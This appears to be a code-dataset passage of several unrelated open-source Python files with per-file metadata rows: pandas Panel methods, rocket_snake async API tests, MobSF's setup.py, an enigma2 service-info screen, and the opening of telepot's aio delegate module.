obj = Series(values[tuple(indexer)], index=slice_axis, name=pts)
result = func(obj)
results.append(result)
# increment the indexer
slice_indexer[-1] += 1
n = -1
while (slice_indexer[n] >= shape[n]) and (n > (1 - ndim)):
slice_indexer[n - 1] += 1
slice_indexer[n] = 0
n -= 1
# empty object
if not len(results):
return self._constructor(**self._construct_axes_dict())
# same ndim as current
if isinstance(results[0], Series):
arr = np.vstack([r.values for r in results])
arr = arr.T.reshape(tuple([len(slice_axis)] + list(shape)))
tranp = np.array([axis] + indlist).argsort()
arr = arr.transpose(tuple(list(tranp)))
return self._constructor(arr, **self._construct_axes_dict())
# ndim-1 shape
results = np.array(results).reshape(shape)
if results.ndim == 2 and axis_name != self._info_axis_name:
results = results.T
planes = planes[::-1]
return self._construct_return_type(results, planes)
def _apply_2d(self, func, axis):
"""
Handle 2-d slices, equiv to iterating over the other axis.
"""
ndim = self.ndim
axis = [self._get_axis_number(a) for a in axis]
# construct slabs, in 2-d this is a DataFrame result
indexer_axis = list(range(ndim))
for a in axis:
indexer_axis.remove(a)
indexer_axis = indexer_axis[0]
slicer = [slice(None, None)] * ndim
ax = self._get_axis(indexer_axis)
results = []
for i, e in enumerate(ax):
slicer[indexer_axis] = i
sliced = self.iloc[tuple(slicer)]
obj = func(sliced)
results.append((e, obj))
return self._construct_return_type(dict(results))
def _reduce(self, op, name, axis=0, skipna=True, numeric_only=None,
filter_type=None, **kwds):
if numeric_only:
raise NotImplementedError('Panel.{0} does not implement '
'numeric_only.'.format(name))
if axis is None and filter_type == 'bool':
# labels = None
# constructor = None
axis_number = None
axis_name = None
else:
# TODO: Make other agg func handle axis=None properly
axis = self._get_axis_number(axis)
# labels = self._get_agg_axis(axis)
# constructor = self._constructor
axis_name = self._get_axis_name(axis)
axis_number = self._get_axis_number(axis_name)
f = lambda x: op(x, axis=axis_number, skipna=skipna, **kwds)
with np.errstate(all='ignore'):
result = f(self.values)
if axis is None and filter_type == 'bool':
return np.bool_(result)
axes = self._get_plane_axes(axis_name)
if result.ndim == 2 and axis_name != self._info_axis_name:
result = result.T
return self._construct_return_type(result, axes)
def _construct_return_type(self, result, axes=None):
"""
Return the type for the ndim of the result.
"""
ndim = getattr(result, 'ndim', None)
# need to assume they are the same
if ndim is None:
if isinstance(result, dict):
ndim = getattr(list(compat.itervalues(result))[0], 'ndim', 0)
# have a dict, so top-level is +1 dim
if ndim != 0:
ndim += 1
# scalar
if ndim == 0:
return Series(result)
# same as self
elif self.ndim == ndim:
# return the construction dictionary for these axes
if axes is None:
return self._constructor(result)
return self._constructor(result, **self._construct_axes_dict())
# sliced
elif self.ndim == ndim + 1:
if axes is None:
return self._constructor_sliced(result)
return self._constructor_sliced(
result, **self._extract_axes_for_slice(self, axes))
raise ValueError('invalid _construct_return_type [self->{self}] '
'[result->{result}]'.format(self=self, result=result))
def _wrap_result(self, result, axis):
axis = self._get_axis_name(axis)
axes = self._get_plane_axes(axis)
if result.ndim == 2 and axis != self._info_axis_name:
result = result.T
return self._construct_return_type(result, axes)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.reindex.__doc__)
def reindex(self, *args, **kwargs):
major = kwargs.pop("major", None)
minor = kwargs.pop('minor', None)
if major is not None:
if kwargs.get("major_axis"):
raise TypeError("Cannot specify both 'major' and 'major_axis'")
kwargs['major_axis'] = major
if minor is not None:
if kwargs.get("minor_axis"):
raise TypeError("Cannot specify both 'minor' and 'minor_axis'")
kwargs['minor_axis'] = minor
axes = validate_axis_style_args(self, args, kwargs, 'labels',
'reindex')
kwargs.update(axes)
kwargs.pop('axis', None)
kwargs.pop('labels', None)
with warnings.catch_warnings():
warnings.simplefilter("ignore", FutureWarning)
# do not warn about constructing Panel when reindexing
result = super(Panel, self).reindex(**kwargs)
return result
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.rename.__doc__)
def rename(self, items=None, major_axis=None, minor_axis=None, **kwargs):
major_axis = (major_axis if major_axis is not None else
kwargs.pop('major', None))
minor_axis = (minor_axis if minor_axis is not None else
kwargs.pop('minor', None))
return super(Panel, self).rename(items=items, major_axis=major_axis,
minor_axis=minor_axis, **kwargs)
@Appender(_shared_docs['reindex_axis'] % _shared_doc_kwargs)
def reindex_axis(self, labels, axis=0, method=None, level=None, copy=True,
limit=None, fill_value=np.nan):
return super(Panel, self).reindex_axis(labels=labels, axis=axis,
method=method, level=level,
copy=copy, limit=limit,
fill_value=fill_value)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.transpose.__doc__)
def transpose(self, *args, **kwargs):
# check if a list of axes was passed in instead as a
# single *args element
if (len(args) == 1 and hasattr(args[0], '__iter__') and
not is_string_like(args[0])):
axes = args[0]
else:
axes = args
if 'axes' in kwargs and axes:
raise TypeError("transpose() got multiple values for "
"keyword argument 'axes'")
elif not axes:
axes = kwargs.pop('axes', ())
return super(Panel, self).transpose(*axes, **kwargs)
@Substitution(**_shared_doc_kwargs)
@Appender(NDFrame.fillna.__doc__)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None, **kwargs):
return super(Panel, self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast, **kwargs)
def count(self, axis='major'):
"""
Return number of observations over requested axis.
Parameters
----------
axis : {'items', 'major', 'minor'} or {0, 1, 2}
Returns
-------
count : DataFrame
"""
i = self._get_axis_number(axis)
values = self.values
mask = np.isfinite(values)
result = mask.sum(axis=i, dtype='int64')
return self._wrap_result(result, axis)
def shift(self, periods=1, freq=None, axis='major'):
"""
Shift index by desired number of periods with an optional time freq.
The shifted data will not include the dropped periods and the
shifted axis will be smaller than the original. This is different
from the behavior of DataFrame.shift()
Parameters
----------
periods : int
Number of periods to move, can be positive or negative
freq : DateOffset, timedelta, or time rule string, optional
axis : {'items', 'major', 'minor'} or {0, 1, 2}
Returns
-------
shifted : Panel
"""
if freq:
return self.tshift(periods, freq, axis=axis)
return super(Panel, self).slice_shift(periods, axis=axis)
def tshift(self, periods=1, freq=None, axis='major'):
return super(Panel, self).tshift(periods, freq, axis)
def join(self, other, how='left', lsuffix='', rsuffix=''):
"""
Join items with other Panel either on major and minor axes column.
Parameters
----------
other : Panel or list of Panels
Index should be similar to one of the columns in this one
how : {'left', 'right', 'outer', 'inner'}
How to handle indexes of the two objects. Default: 'left'
for joining on index, None otherwise
* left: use calling frame's index
* right: use input frame's index
* outer: form union of indexes
* inner: use intersection of indexes
lsuffix : string
Suffix to use from left frame's overlapping columns
rsuffix : string
Suffix to use from right frame's overlapping columns
Returns
-------
joined : Panel
"""
from pandas.core.reshape.concat import concat
if isinstance(other, Panel):
join_major, join_minor = self._get_join_index(other, how)
this = self.reindex(major=join_major, minor=join_minor)
other = other.reindex(major=join_major, minor=join_minor)
merged_data = this._data.merge(other._data, lsuffix, rsuffix)
return self._constructor(merged_data)
else:
if lsuffix or rsuffix:
raise ValueError('Suffixes not supported when passing '
'multiple panels')
if how == 'left':
how = 'outer'
join_axes = [self.major_axis, self.minor_axis]
elif how == 'right':
raise ValueError('Right join not supported with multiple '
'panels')
else:
join_axes = None
return concat([self] + list(other), axis=0, join=how,
join_axes=join_axes, verify_integrity=True)
@deprecate_kwarg(old_arg_name='raise_conflict', new_arg_name='errors',
mapping={False: 'ignore', True: 'raise'})
def update(self, other, join='left', overwrite=True, filter_func=None,
errors='ignore'):
"""
Modify Panel in place using non-NA values from other Panel.
May also use object coercible to Panel. Will align on items.
Parameters
----------
other : Panel, or object coercible to Panel
The object from which the caller will be udpated.
join : {'left', 'right', 'outer', 'inner'}, default 'left'
How individual DataFrames are joined.
overwrite : bool, default True
If True then overwrite values for common keys in the calling Panel.
filter_func : callable(1d-array) -> 1d-array<bool>, default None
Can choose to replace values other than NA. Return True for values
that should be updated.
errors : {'raise', 'ignore'}, default 'ignore'
If 'raise', will raise an error if a DataFrame and other both.
.. versionchanged :: 0.24.0
Changed from `raise_conflict=False|True`
to `errors='ignore'|'raise'`.
See Also
--------
DataFrame.update : Similar method for DataFrames.
dict.update : Similar method for dictionaries.
"""
if not isinstance(other, self._constructor):
other = self._constructor(other)
axis_name = self._info_axis_name
axis_values = self._info_axis
other = other.reindex(**{axis_name: axis_values})
for frame in axis_values:
self[frame].update(other[frame], join=join, overwrite=overwrite,
filter_func=filter_func, errors=errors)
def _get_join_index(self, other, how):
if how == 'left':
join_major, join_minor = self.major_axis, self.minor_axis
elif how == 'right':
join_major, join_minor = other.major_axis, other.minor_axis
elif how == 'inner':
join_major = self.major_axis.intersection(other.major_axis)
join_minor = self.minor_axis.intersection(other.minor_axis)
elif how == 'outer':
join_major = self.major_axis.union(other.major_axis)
join_minor = self.minor_axis.union(other.minor_axis)
return join_major, join_minor
# miscellaneous data creation
@staticmethod
def _extract_axes(self, data, axes, **kwargs):
"""
Return a list of the axis indices.
"""
return [self._extract_axis(self, data, axis=i, **kwargs)
for i, a in enumerate(axes)]
@staticmethod
def _extract_axes_for_slice(self, axes):
"""
Return the slice dictionary for these axes.
"""
return {self._AXIS_SLICEMAP[i]: a for i, a in
zip(self._AXIS_ORDERS[self._AXIS_LEN - len(axes):], axes)}
@staticmethod
def _prep_ndarray(self, values, copy=True):
if not isinstance(values, np.ndarray):
values = np.asarray(values)
# NumPy strings are a pain, convert to object
if issubclass(values.dtype.type, compat.string_types):
values = np.array(values, dtype=object, copy=True)
else:
if copy:
values = values.copy()
if values.ndim != self._AXIS_LEN:
raise ValueError("The number of dimensions required is {0}, "
"but the number of dimensions of the "
"ndarray given was {1}".format(self._AXIS_LEN,
values.ndim))
return values
@staticmethod
def _homogenize_dict(self, frames, intersect=True, dtype=None):
"""
Conform set of _constructor_sliced-like objects to either
an intersection of indices / columns or a union.
Parameters
----------
frames : dict
intersect : boolean, default True
Returns
-------
dict of aligned results & indices
"""
result = dict()
# caller differs dict/ODict, preserved type
if isinstance(frames, OrderedDict):
result = OrderedDict()
adj_frames = OrderedDict()
for k, v in compat.iteritems(frames):
if isinstance(v, dict):
adj_frames[k] = self._constructor_sliced(v)
else:
adj_frames[k] = v
axes = self._AXIS_ORDERS[1:]
axes_dict = {a: ax for a, ax in zip(axes, self._extract_axes(
self, adj_frames, axes, intersect=intersect))}
reindex_dict = {self._AXIS_SLICEMAP[a]: axes_dict[a] for a in axes}
reindex_dict['copy'] = False
for key, frame in compat.iteritems(adj_frames):
if frame is not None:
result[key] = frame.reindex(**reindex_dict)
else:
result[key] = None
axes_dict['data'] = result
axes_dict['dtype'] = dtype
return axes_dict
@staticmethod
def _extract_axis(self, data, axis=0, intersect=False):
index = None
if len(data) == 0:
index = Index([])
elif len(data) > 0:
raw_lengths = []
have_raw_arrays = False
have_frames = False
for v in data.values():
if isinstance(v, self._constructor_sliced):
have_frames = True
elif v is not None:
have_raw_arrays = True
raw_lengths.append(v.shape[axis])
if have_frames:
# we want the "old" behavior here, of sorting only
# 1. we're doing a union (intersect=False)
# 2. the indices are not aligned.
index = _get_objs_combined_axis(data.values(), axis=axis,
intersect=intersect, sort=None)
if have_raw_arrays:
lengths = list(set(raw_lengths))
if len(lengths) > 1:
raise ValueError('ndarrays must match shape on '
'axis {ax}'.format(ax=axis))
if have_frames:
if lengths[0] != len(index):
raise AssertionError('Length of data and index must match')
else:
index = Index(np.arange(lengths[0]))
if index is None:
index = Index([])
return ensure_index(index)
def sort_values(self, *args, **kwargs):
"""
NOT IMPLEMENTED: do not call this method, as sorting values is not
supported for Panel objects and will raise an error.
"""
super(Panel, self).sort_values(*args, **kwargs)
Panel._setup_axes(axes=['items', 'major_axis', 'minor_axis'], info_axis=0,
stat_axis=1, aliases={'major': 'major_axis',
'minor': 'minor_axis'},
slicers={'major_axis': 'index',
'minor_axis': 'columns'},
docs={})
ops.add_special_arithmetic_methods(Panel)
ops.add_flex_arithmetic_methods(Panel)
Panel._add_numeric_operations()
|
bsd-3-clause
| -7,667,139,979,059,347,000
| 34.208438
| 79
| 0.545581
| false
| 4.175267
| false
| false
| false
|
Drummersbrother/rocket-snake
|
tests/experiments.py
|
1
|
7041
|
import asyncio
import json
import time
import unittest
from pprint import pprint
import rocket_snake
with open("tests/config.json", "r") as config_file:
config = json.load(config_file)
def async_test(f):
def wrapper(*args, **kwargs):
future = f(*args, **kwargs)
loop = args[0].running_loop
loop.run_until_complete(future)
return wrapper
class AsyncTester(unittest.TestCase):
"""Test async code easily by inheriting from this."""
@staticmethod
def _do_async_code(coro):
return asyncio.get_event_loop().run_until_complete(coro)
def setUp(self, *args, **kwargs):
super().setUp()
self.running_loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.running_loop)
self.time_track_stack = []
def tearDown(self, *args, **kwargs):
super().setUp()
if not self.running_loop.is_closed():
self.running_loop.close()
def time_track(self, text: object="Time taken was {0} seconds."):
if text is None:
self.time_track_stack.append(time.time())
else:
last_time = self.time_track_stack.pop()
time_delta = time.time() - last_time
print(text.format(round(time_delta, 3)))
return time_delta
class Tester(AsyncTester):
def setUp(self, *args, **kwargs):
super().setUp(*args, **kwargs)
self.executed_requests = 0
async def do_multiple(self, func, times: int = 10, text: str = "Time taken was {0} seconds."):
self.time_track(None)
tasks = [func() for i in range(times)]
tasks = await asyncio.gather(*tasks, loop=asyncio.get_event_loop(), return_exceptions=False)
gather_time = self.time_track("Time taken for {0} gather tasks was ".format(times) + "{0} seconds.")
print("That means an average of {0} milliseconds per gather request.".format(
round(1000 * (gather_time / times), 1)))
total_series_time = 0
for i in range(times):
self.time_track(None)
await func()
total_series_time += self.time_track(text)
print("Time taken for {0} series tasks was {1} seconds.".format(times, round(total_series_time, 3)))
print("That means an average of {0} milliseconds per series request.".format(
round(1000 * (total_series_time / times), 1)))
return times * 2
@async_test
async def test_data_endpoints(self):
self.time_track(None)
print("Testing data endpoints.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
print("Playlists:")
pprint(await client.get_playlists())
print("\nSeasons:")
pprint(await client.get_seasons())
print("\nPlatforms:")
pprint(await client.get_platforms())
print("\nTiers:")
pprint(await client.get_tiers())
print("\n")
self.executed_requests += 7
print("Done with testing data endpoints. Time taken was {0} seconds.".format(self.time_track("Time taken for data endpoints was {0} seconds.")))
@async_test
async def test_player_search(self):
self.time_track(None)
print("Testing player search.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
pprint(await client.search_player("Mike", get_all=False))
print("Done with testing player search. Time taken was {0} seconds.".format(self.time_track("Time taken for player search was {0} seconds.")))
@async_test
async def test_player_endpoints(self):
self.time_track(None)
print("Testing player endpoints.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
pprint(await client.search_player("Mike", get_all=False))
print("Me:")
self.time_track(None)
print(str(await client.get_player(config["steam_ids"][0], rocket_snake.constants.STEAM)))
self.time_track("Time taken for single player was {0} seconds.")
print("Loads a people:")
self.time_track(None)
pprint(await client.get_players(
list(zip(config["steam_ids"], [rocket_snake.constants.STEAM] * len(config["steam_ids"])))))
self.time_track("Time taken for batch players was {0} seconds.")
print("Done with testing player endpoints. Time taken was {0} seconds.§".format(self.time_track("Time taken for player endpoints was {0} seconds.")))
@async_test
async def test_platforms_throughput(self):
self.time_track(None)
print("Testing platforms data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_platforms, text="Platforms took {0} seconds.")
print("Done with platforms data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for platforms data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_tiers_throughput(self):
self.time_track(None)
print("Testing tiers data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_tiers, text="tiers took {0} seconds.")
print("Done with tiers data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for tiers data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_seasons_throughput(self):
self.time_track(None)
print("Testing seasons data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_seasons, text="seasons took {0} seconds.")
print("Done with seasons data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for seasons data throughput was {0} seconds.") / done_requests), 1)))
@async_test
async def test_playlists_throughput(self):
self.time_track(None)
print("Testing playlists data throughput.")
client = rocket_snake.RLS_Client(api_key=config["key"], auto_rate_limit=True)
done_requests = await self.do_multiple(client.get_playlists, text="playlists took {0} seconds.")
print("Done with playlists data throughput testing, {0} requests were executed. \nThat means an average of {1} milliseconds per request."
.format(done_requests, round(1000 * (self.time_track("Time taken for playlists data throughput was {0} seconds.") / done_requests), 1)))
|
apache-2.0
| -4,465,343,280,217,194,500
| 37.26087
| 157
| 0.640767
| false
| 3.762694
| true
| false
| false
|
MobSF/Mobile-Security-Framework-MobSF
|
setup.py
|
1
|
1749
|
#!/usr/bin/env python3
"""Setup for MobSF."""
from setuptools import (
find_packages,
setup,
)
from pathlib import Path
def read(rel_path):
init = Path(__file__).resolve().parent / rel_path
return init.read_text('utf-8', 'ignore')
def get_version():
ver_path = 'mobsf/MobSF/init.py'
for line in read(ver_path).splitlines():
if line.startswith('VERSION'):
return line.split('\'')[1]
raise RuntimeError('Unable to find version string.')
description = (
'Mobile Security Framework (MobSF) is an automated,'
' all-in-one mobile application (Android/iOS/Windows) pen-testing,'
' malware analysis and security assessment framework capable of '
'performing static and dynamic analysis.')
setup(
name='mobsf',
version=get_version(),
description=description,
author='Ajin Abraham',
author_email='ajin25@gmail.com',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Programming Language :: Python :: 3.8',
'Topic :: Security',
'Topic :: Software Development :: Quality Assurance',
],
packages=find_packages(include=[
'mobsf', 'mobsf.*',
]),
include_package_data=True,
python_requires='>=3.8<=3.9',
entry_points={
'console_scripts': [
'mobsf = mobsf.__main__:main',
'mobsfdb = mobsf.__main__:db',
],
},
url='https://github.com/MobSF/Mobile-Security-Framework-MobSF',
long_description=read('README.md'),
long_description_content_type='text/markdown',
install_requires=Path('requirements.txt').read_text().splitlines(),
)
|
gpl-3.0
| -4,701,759,006,805,439,000
| 27.672131
| 75
| 0.621498
| false
| 3.729211
| false
| false
| false
|
eesatfan/vuplus-enigma2
|
lib/python/Screens/ServiceInfo.py
|
1
|
9869
|
from Components.HTMLComponent import HTMLComponent
from Components.GUIComponent import GUIComponent
from Screen import Screen
from Components.ActionMap import ActionMap
from Components.Label import Label
from ServiceReference import ServiceReference
from enigma import eListboxPythonMultiContent, eListbox, gFont, iServiceInformation, eServiceCenter
from Tools.Transponder import ConvertToHumanReadable
RT_HALIGN_LEFT = 0
TYPE_TEXT = 0
TYPE_VALUE_HEX = 1
TYPE_VALUE_DEC = 2
TYPE_VALUE_HEX_DEC = 3
TYPE_SLIDER = 4
def to_unsigned(x):
return x & 0xFFFFFFFF
def ServiceInfoListEntry(a, b, valueType=TYPE_TEXT, param=4):
print "b:", b
if not isinstance(b, str):
if valueType == TYPE_VALUE_HEX:
b = ("0x%0" + str(param) + "x") % to_unsigned(b)
elif valueType == TYPE_VALUE_DEC:
b = str(b)
elif valueType == TYPE_VALUE_HEX_DEC:
b = ("0x%0" + str(param) + "x (%dd)") % (to_unsigned(b), b)
else:
b = str(b)
return [
#PyObject *type, *px, *py, *pwidth, *pheight, *pfnt, *pstring, *pflags;
(eListboxPythonMultiContent.TYPE_TEXT, 0, 0, 200, 30, 0, RT_HALIGN_LEFT, ""),
(eListboxPythonMultiContent.TYPE_TEXT, 0, 0, 200, 25, 0, RT_HALIGN_LEFT, a),
(eListboxPythonMultiContent.TYPE_TEXT, 220, 0, 350, 25, 0, RT_HALIGN_LEFT, b)
]
class ServiceInfoList(HTMLComponent, GUIComponent):
def __init__(self, source):
GUIComponent.__init__(self)
self.l = eListboxPythonMultiContent()
self.list = source
self.l.setList(self.list)
self.l.setFont(0, gFont("Regular", 23))
self.l.setItemHeight(25)
GUI_WIDGET = eListbox
def postWidgetCreate(self, instance):
self.instance.setContent(self.l)
TYPE_SERVICE_INFO = 1
TYPE_TRANSPONDER_INFO = 2
class ServiceInfo(Screen):
def __init__(self, session, serviceref=None):
Screen.__init__(self, session)
self["actions"] = ActionMap(["OkCancelActions", "ColorActions"],
{
"ok": self.close,
"cancel": self.close,
"red": self.information,
"green": self.pids,
"yellow": self.transponder,
"blue": self.tuner
}, -1)
if serviceref:
self.type = TYPE_TRANSPONDER_INFO
self["red"] = Label()
self["green"] = Label()
self["yellow"] = Label()
self["blue"] = Label()
info = eServiceCenter.getInstance().info(serviceref)
self.transponder_info = info.getInfoObject(serviceref, iServiceInformation.sTransponderData)
# info is a iStaticServiceInformation, not a iServiceInformation
self.info = None
self.feinfo = None
else:
self.type = TYPE_SERVICE_INFO
self["red"] = Label(_("Service"))
self["green"] = Label(_("PIDs"))
self["yellow"] = Label(_("Multiplex"))
self["blue"] = Label(_("Tuner status"))
service = session.nav.getCurrentService()
if service is not None:
self.info = service.info()
self.feinfo = service.frontendInfo()
print self.info.getInfoObject(iServiceInformation.sCAIDs);
else:
self.info = None
self.feinfo = None
tlist = [ ]
self["infolist"] = ServiceInfoList(tlist)
self.onShown.append(self.information)
def information(self):
if self.type == TYPE_SERVICE_INFO:
if self.session.nav.getCurrentlyPlayingServiceReference():
name = ServiceReference(self.session.nav.getCurrentlyPlayingServiceReference()).getServiceName()
refstr = self.session.nav.getCurrentlyPlayingServiceReference().toString()
else:
name = _("N/A")
refstr = _("N/A")
aspect = self.getServiceInfoValue(iServiceInformation.sAspect)
if aspect in ( 1, 2, 5, 6, 9, 0xA, 0xD, 0xE ):
aspect = _("4:3")
else:
aspect = _("16:9")
width = self.info and self.info.getInfo(iServiceInformation.sVideoWidth) or -1
height = self.info and self.info.getInfo(iServiceInformation.sVideoHeight) or -1
if width != -1 and height != -1:
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Aspect ratio"), aspect, TYPE_TEXT),
(_("Resolution"), "%dx%d" %(width, height), TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
else:
Labels = ( (_("Name"), name, TYPE_TEXT),
(_("Provider"), self.getServiceInfoValue(iServiceInformation.sProvider), TYPE_TEXT),
(_("Aspect ratio"), aspect, TYPE_TEXT),
(_("Namespace"), self.getServiceInfoValue(iServiceInformation.sNamespace), TYPE_VALUE_HEX, 8),
(_("Service reference"), refstr, TYPE_TEXT))
self.fillList(Labels)
else:
if self.transponder_info:
tp_info = ConvertToHumanReadable(self.transponder_info)
conv = { "tuner_type" : _("Type"),
"system" : _("System"),
"modulation" : _("Modulation"),
"orbital_position" : _("Orbital position"),
"frequency" : _("Frequency"),
"symbol_rate" : _("Symbol rate"),
"bandwidth" : _("Bandwidth"),
"polarization" : _("Polarization"),
"inversion" : _("Inversion"),
"pilot" : _("Pilot"),
"rolloff" : _("Roll-off"),
"fec_inner" : _("FEC"),
"code_rate_lp" : _("Code rate LP"),
"code_rate_hp" : _("Code rate HP"),
"constellation" : _("Constellation"),
"transmission_mode" : _("Transmission mode"),
"guard_interval" : _("Guard interval"),
"hierarchy_information" : _("Hierarchy info") }
Labels = [(conv[i], tp_info[i], TYPE_VALUE_DEC) for i in tp_info.keys()]
self.fillList(Labels)
def pids(self):
if self.type == TYPE_SERVICE_INFO:
Labels = ( (_("Video PID"), self.getServiceInfoValue(iServiceInformation.sVideoPID), TYPE_VALUE_HEX_DEC, 4),
(_("Audio PID"), self.getServiceInfoValue(iServiceInformation.sAudioPID), TYPE_VALUE_HEX_DEC, 4),
(_("PCR PID"), self.getServiceInfoValue(iServiceInformation.sPCRPID), TYPE_VALUE_HEX_DEC, 4),
(_("PMT PID"), self.getServiceInfoValue(iServiceInformation.sPMTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TXT PID"), self.getServiceInfoValue(iServiceInformation.sTXTPID), TYPE_VALUE_HEX_DEC, 4),
(_("TSID"), self.getServiceInfoValue(iServiceInformation.sTSID), TYPE_VALUE_HEX_DEC, 4),
(_("ONID"), self.getServiceInfoValue(iServiceInformation.sONID), TYPE_VALUE_HEX_DEC, 4),
(_("SID"), self.getServiceInfoValue(iServiceInformation.sSID), TYPE_VALUE_HEX_DEC, 4))
self.fillList(Labels)
def showFrontendData(self, real):
if self.type == TYPE_SERVICE_INFO:
frontendData = self.feinfo and self.feinfo.getAll(real)
Labels = self.getFEData(frontendData)
self.fillList(Labels)
def transponder(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(True)
def tuner(self):
if self.type == TYPE_SERVICE_INFO:
self.showFrontendData(False)
def getFEData(self, frontendDataOrg):
if frontendDataOrg and len(frontendDataOrg):
frontendData = ConvertToHumanReadable(frontendDataOrg)
if frontendDataOrg["tuner_type"] == "DVB-S":
return ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("System"), frontendData["system"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Orbital position"), frontendData["orbital_position"], TYPE_VALUE_DEC),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Polarization"), frontendData["polarization"], TYPE_TEXT),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT),
(_("Pilot"), frontendData.get("pilot", None), TYPE_TEXT),
(_("Roll-off"), frontendData.get("rolloff", None), TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-C":
return ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("Modulation"), frontendData["modulation"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Symbol rate"), frontendData["symbol_rate"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("FEC"), frontendData["fec_inner"], TYPE_TEXT))
elif frontendDataOrg["tuner_type"] == "DVB-T":
data = ((_("NIM"), ('A', 'B', 'C', 'D', 'E', 'F', 'G', 'H')[frontendData["tuner_number"]], TYPE_TEXT),
(_("Type"), frontendData["tuner_type"], TYPE_TEXT),
(_("System"), frontendData["system"], TYPE_TEXT),
(_("Frequency"), frontendData["frequency"], TYPE_VALUE_DEC),
(_("Inversion"), frontendData["inversion"], TYPE_TEXT),
(_("Bandwidth"), frontendData["bandwidth"], TYPE_VALUE_DEC),
(_("Code rate LP"), frontendData["code_rate_lp"], TYPE_TEXT),
(_("Code rate HP"), frontendData["code_rate_hp"], TYPE_TEXT),
(_("Constellation"), frontendData["constellation"], TYPE_TEXT),
(_("Transmission mode"), frontendData["transmission_mode"], TYPE_TEXT),
(_("Guard interval"), frontendData["guard_interval"], TYPE_TEXT),
(_("Hierarchy info"), frontendData["hierarchy_information"], TYPE_TEXT))
if frontendData.has_key("plp_id"):
data += ((_("PLP ID"), frontendData["plp_id"], TYPE_VALUE_DEC), )
return data
return [ ]
def fillList(self, Labels):
tlist = [ ]
for item in Labels:
if item[1] is None:
continue;
value = item[1]
if len(item) < 4:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2]))
else:
tlist.append(ServiceInfoListEntry(item[0]+":", value, item[2], item[3]))
self["infolist"].l.setList(tlist)
def getServiceInfoValue(self, what):
if self.info is None:
return ""
v = self.info.getInfo(what)
if v == -2:
v = self.info.getInfoString(what)
elif v == -1:
v = _("N/A")
return v
|
gpl-2.0
| -2,097,492,960,710,691,000
| 38.794355
| 111
| 0.644544
| false
| 3.121126
| false
| false
| false
|
mpunkenhofer/irc-telegram-bot
|
telepot/telepot/aio/delegate.py
|
1
|
3780
|
"""
Like :mod:`telepot.delegate`, this module has a bunch of seeder factories
and delegator factories.
.. autofunction:: per_chat_id
.. autofunction:: per_chat_id_in
.. autofunction:: per_chat_id_except
.. autofunction:: per_from_id
.. autofunction:: per_from_id_in
.. autofunction:: per_from_id_except
.. autofunction:: per_inline_from_id
.. autofunction:: per_inline_from_id_in
.. autofunction:: per_inline_from_id_except
.. autofunction:: per_application
.. autofunction:: per_message
.. autofunction:: per_event_source_id
.. autofunction:: per_callback_query_chat_id
.. autofunction:: per_callback_query_origin
.. autofunction:: until
.. autofunction:: chain
.. autofunction:: pair
.. autofunction:: pave_event_space
.. autofunction:: include_callback_query_chat_id
.. autofunction:: intercept_callback_query_origin
"""
import asyncio
import traceback
from .. import exception
from . import helper
# Mirror traditional version to avoid having to import one more module
from ..delegate import (
per_chat_id, per_chat_id_in, per_chat_id_except,
per_from_id, per_from_id_in, per_from_id_except,
per_inline_from_id, per_inline_from_id_in, per_inline_from_id_except,
per_application, per_message, per_event_source_id,
per_callback_query_chat_id, per_callback_query_origin,
until, chain, pair, pave_event_space,
include_callback_query_chat_id, intercept_callback_query_origin
)
def _ensure_coroutine_function(fn):
return fn if asyncio.iscoroutinefunction(fn) else asyncio.coroutine(fn)
def call(corofunc, *args, **kwargs):
"""
:return:
a delegator function that returns a coroutine object by calling
``corofunc(seed_tuple, *args, **kwargs)``.
"""
